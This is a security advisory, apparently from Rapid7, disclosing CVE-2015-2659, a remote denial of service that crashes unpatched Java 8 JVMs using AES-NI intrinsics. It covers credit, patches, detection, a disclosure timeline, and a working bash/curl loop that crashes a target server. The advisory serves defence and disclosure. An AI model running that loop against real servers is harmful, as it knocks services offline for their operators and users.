Oracle Java JRE AES Intrinsics Remote Denial of Service (CVE-2015-2659)

Last updated at Fri, 26 Jan 2024 21:23:53 GMT

Java 8 servers versions prior to u46 are susceptible to a remote unauthenticated denial of service (hard crash) when used with AES intrinsics (AES-NI) CPU extensions on supported processors. AES intrinsics are enabled by default on the Oracle JVM if the the JVM detects that processor capability, which is common for modern processors manufactured after 2010. For more on AES-NI, see the Wikipedia article.

This issue was tracked in the OpenJDK public bug tracker as JDK-8067648, but was not initially classified as a security issue.

Credit

This issue was discovered by Derek Abdine of Rapid7, Inc., and was reported to Oracle and CERT/CC per Rapid7's vulnerability disclosure policy.

Patch and Workarounds

The July 2015 Oracle CPU has been released that addresses CVE-2015-2659. Note that AES-NI can be disabled at runtime with the option -UseAESIntrincs. Sites which cannot be patched in a timely manner are advised to disable AES-NI.

Detection

If the JVM is not patched, and returns "true" for UseAESIntrinsics, the JVM process is vulnerable. Non-vulnerable servers return false for "UseAESIntrinsics".

    java -XX:+PrintFlagsFinal -version | grep "UseAESIntrinsics"  

Vulnerable versions prior to u46 will return (spaces stripped):

    bool UseAESIntrinsics = true {product}  

In addition, the July 2015 Nexpose release will contain a check for vulnerable versions of Java.

Exploitation

The below bash shell script can trigger the denial of service condition by crashing the target JVM, where the target application URI is https://host:port/dir.

while true;  
  do curl 'https://host:port/dir' \  
  -H 'Content-Type: application/x-www-form-urlencoded' \  
  -d "$(printf '%0.sa' {1..4097})" --insecure --ciphers AESGCM -v;  
done;  

Note that not all versions of curl support the --ciphers option. Most Linux distributions do, but Apple OSX's default implementation of curl does not.

Disclosure Timeline

• Tue, May 05, 2015: Initial contact to vendor
• Mon, May 11, 2015: Proof of concept and advisory provided to vendor
• Mon, Jun 01, 2015: Disclosure to CERT/CC, VU#513484 assigned.
• Tue, Jul 14, 2015: Vendor patch released as part of July 2015 CPU.
• Thu, Jul 16, 2015: Public disclosure at https://r-7.co/R7-2015-09